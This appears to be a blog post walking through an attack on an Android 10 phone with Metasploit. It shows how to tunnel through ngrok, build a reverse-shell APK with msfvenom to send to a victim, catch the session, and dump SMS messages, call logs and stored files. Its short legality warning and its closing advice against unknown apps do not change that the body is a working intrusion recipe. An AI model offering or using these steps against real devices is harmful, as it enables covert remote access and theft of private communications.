Open in app

Sign in

Write

Sign in

Android Hacking with Metasploit

#$ubh@nk@r
4 min readJul 1, 2023

--

Intro : Android Hacking is one of the wonderful art as a Red Hat Hacker. It is the way to gain all access to your Android Mobile. Today we will discuss about how we can hack an Android as a testing.

Warning : Don’t hack anyone with and without any purpose. Hacking is totally Illegal. So let’s start.

Beginning :

Today we will Hack Android 10.

Note : Today’s exploit will not work on Android 11 ,12 etc.

So all we need an Android Mobile, A Hacking ‘OS’ (kali, parrot etc), ‘metasploit-framework’ and ‘ngrok’.

Note : Using Ngrok you can perform attack on WAN. It help us for Port Forwarding. If you use your own local IP the exploit will work only your Network.

Start Ngrok Server :

At first download Ngrok from it’s Website.

Tip : ngrok tcp <any_port> [I use 4444]

It will give tcp://<something>:<port>. The first Part act as IP and second Part act as Port in our Payload which we will make. It will forward Port to us (localhost : 4444) on our Machine.

Making Payload :

Now we have to make an Android Payload with apk extension which we will send to Victim. We use a Tool called ‘msfvenom’.

Tip : msfvenom -p android/meterpreter/reverse_tcp LHOST=<ngrok_ip> LPORT=<ngrok_port> R> android.apk

Msfconsole :

Then I start msfconsole.

We have to set some options to catch the Connection when victim will download that App.

Tip : use /multi/handler

Tip : set payload android/meterpreter/reverse_tcp

Then we have to set LHOST to 127.0.0.1 and LPORT to 4444. Then type exploit and press Enter. It will start a Reverse TCP Handler to catch the reverse Connection.

Tip : set LHOST 127.0.0.1

Tip : set LPORT 4444

Get Access :

Then I Download the app in Mobile. This is the Malicious App. Remember to allow all Permissions when installing the App or it will not work and press on that Application.

After a Second I saw a session opened in msfconsole and we get a Meterpreter Reverse Connection. Booommmmm!!!!

Tip : Type ‘help’ command in meterpreter to see more.

After typing ‘sysinfo’ command I found It is Android 10. Amazing!!!!

I type dump_sms and dump_calllog to dump all things. It will save it in Text File. Here is a demo of an SMS present in Mobile.

At last I go to ‘sdcard’ to see all files present in that Mobile. And it is totally Accurate.

Tip : pwd

Tip : cd sdcard

Tip : ls

Here I found Android, Alarm, Call, DICM etc basic files present in Android System. Here is a Demo.

So at last we get total Remote Access of that Android Mobile. How Simple! That’s how an Attacker gain remote access on a Mobile if you are not aware. So don’t download any Third Party or Unknown Application in your Android. So be Warned.

THANKS FOR READING!!

Happy Hacking~

--

--

#$ubh@nk@r
#$ubh@nk@r

Written by #$ubh@nk@r

829 Followers
53 Following

CyberSecurity Learner, CTF Player, Noob Bug Hunter https://starlox0.github.io/

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams